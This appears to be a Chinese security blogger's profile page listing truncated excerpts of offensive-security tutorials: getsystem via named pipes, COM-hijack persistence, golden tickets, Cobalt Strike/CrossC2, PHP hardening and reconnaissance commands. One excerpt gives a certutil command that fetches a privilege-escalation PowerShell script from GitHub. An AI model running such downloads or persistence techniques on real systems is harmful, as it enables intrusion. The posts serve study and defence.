
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
CATALOG1.前言2.windows命名管道3.msf中getsystem原理4.参考文章1.前言之前已经写过了winodws命名管道相关的知识,在我的由psexec远控的实现原理到windows命名管道这篇文章中,最近复习的时候又看到了,同时对其有了新的理解,进而又想起了msf中getsystem的原理发现两者刚好有所关联,于是有了这篇文章。2.windows命名管道首先我们需要明确的一点,
前言看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。实现脚本下载certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1在windows下启动一个administrator权限的powershell. .\psge
防御方式升级到PHP 7.1,该版本对大部分常见的执行动态代码的方法进行了封堵。php.ini中,关闭“allow_url_fopen”。在打开它的情况下,可以通过 phar:// 等协议丢给include,让其执行动态代码。php.ini中,通过disable_functions关闭 exec,passthru,shell_exec,system 等函数,禁止PHP调用外部程序。永远不要在代码中
文章目录1. 前言2. 为什么会存在序列化技术2. 序列化1. 前言java反序列化是将一个序列化文件或者序列化数据进行还原处理。一个被序列化的数据的2进制数据特征是以aced0005开头,有点类似于exe文件都有PE头一样,具体如下所示:序列化技术的出现,是为了方便数据保存与传输的。它将数据变成了字节的形式进行保存并便于通过socket进行传输。2. 为什么会存在序列化技术1、方便对象的保存2、
CATALOG前言操作过程对抗方法参考文章前言这是一种主动的后门触发方式,只要对方主机重启机器的操作,就会触发我们之前设置的dll。系统在启动时默认启动进程explorer.exe,如果劫持了COM对象MruPidlList,就能劫持进程explorer.exe,实现后门随系统开机启动,相当于是主动后门。而劫持MruPidlList劫持注册表中的一个{42aedc87-2188-41fd-b9a3
原理黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个t
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3ANX6p5X-1597048406819)(evernotecid://90B54479-F8FA-4F06-9F90-73E6593C6866/appyinxiangcom/27458002/ENResource/p155)]
CATALOG前言配置CS与CrossC2简单的使用前言CS主要用来做windows渗透,现通过CrossC2插件即可实现上线linux主机。CrossC2下载CrossC2官方手册其他须知:目前只支持cs3.14版本,经测试,4.0版本可以上线主机但无法执行其他任何操作。配置CS与CrossC2下载完成CrossC2后打开CrossC2.cna文件修改CC2_PATH路径为当前路径,并检查CC2
文章目录1. 数据安全建设需要解决的问题1.1 敏感数据识别1.2 数据审计1.3 数据脱敏1.4 数据泄露检测与防护(DLP系统)1.5 数据恢复功能1.6 数据加解密功能2. 等保中对数据安全的要求与解决方案2.1 数据完整性2.2 数据保密性2.3 数据备份恢复1. 数据安全建设需要解决的问题1.1 敏感数据识别从海量数据中发现和锁定保护对象,通过内置算法规则和自定义敏感数据识别规则,对其存
内网ip段A类:10.0.0.0-10.255.255.255B类:172.16.0.0-172.31.255.255C类:192.168.0.0-192.168.255.255获取主机名hostname或者echo %COMPUTERNAME%systeminfosysteminfo | find /i "domain"#查看机器在哪个域systeminfo | find /i "KB"#查看系







